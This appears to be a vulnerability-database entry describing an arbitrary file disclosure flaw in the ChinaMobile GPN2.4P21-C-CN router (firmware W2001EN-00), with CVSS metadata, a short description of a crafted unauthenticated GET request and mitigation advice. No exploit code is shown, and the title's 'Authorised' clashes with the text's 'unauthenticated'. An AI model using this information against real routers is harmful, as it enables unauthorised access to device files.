vendor:
GPN2.4P21-C-CN
by:
Rahul Raz
7,5
CVSS
HIGH
Arbitrary File Disclosure
200
CWE
Product Name: GPN2.4P21-C-CN
Affected Version From: W2001EN-00
Affected Version To: W2001EN-00
Patch Exists: YES
Related CWE: N/A
CPE: h:chinamobile:gpn2.4p21-c-cn
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Ubuntu Linux
2016
PLC Wireless Router GPN2.4P21-C-CN Authorised Arbitrary File Disclosure
An unauthenticated attacker can send a specially crafted HTTP GET request to the vulnerable router to disclose arbitrary files from the router's file system. The vulnerable router is GPN2.4P21-C-CN with firmware version W2001EN-00, manufactured by ChinaMobile. The attack has been tested on Ubuntu Linux.
Mitigation:
Authentication should be enabled on the router to prevent unauthorised access. Additionally, the router should be updated to the latest firmware version.
